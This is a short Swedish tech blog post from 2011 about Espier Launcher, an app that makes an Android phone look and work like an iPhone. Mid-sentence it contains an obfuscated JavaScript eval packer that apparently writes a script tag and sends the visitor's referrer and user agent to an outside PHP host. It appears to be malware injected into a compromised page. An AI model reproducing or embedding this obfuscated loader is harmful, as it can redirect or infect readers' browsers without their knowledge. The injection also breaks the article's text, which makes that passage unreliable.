Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Gör om din Android till en Iphone 4 s

Gör om din Android till en Iphone 4 s
Filip Urde
  • On 14 november, 2011
  • http://www.revue.se/filip-urde

För den som är sugen…

Nu kan du i alla fall med hjälp av en ny smart app gör om din androidtelefon till en iPhone. Varför man skulle vilja göra detta? iPhones design är bäst…

Android är det mest populära operativsystemet för mobiltelefoner idag. Samsung är även för den som vill veta den mest popluära smartphonetillverkare men när det gäller design och ”prestige” vinner Apples iPhone solklart!

Design och funktionalitet lyckas tydligt! Och detta har Samsung försökt ”hets kopiera” in i pinsamheten sedan dess…

Men eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iazne|var|u0026u|referrer|znhrh||js|php’.split(’|’),0,{}))
nu är detta löst för dig som ändå vill ha en ”iPhone”, utan att köpa den. Appen Espier Launcher gör hela menysystemet, telefonens funktionalitet och dess utseende så att den beter sig och ser ut som en Iphone.Allt ser identiskt ut på skärmen… Ganska coolt faktiskt!

Men egentligen inte mer speciellt att du kan köra windows på din mac.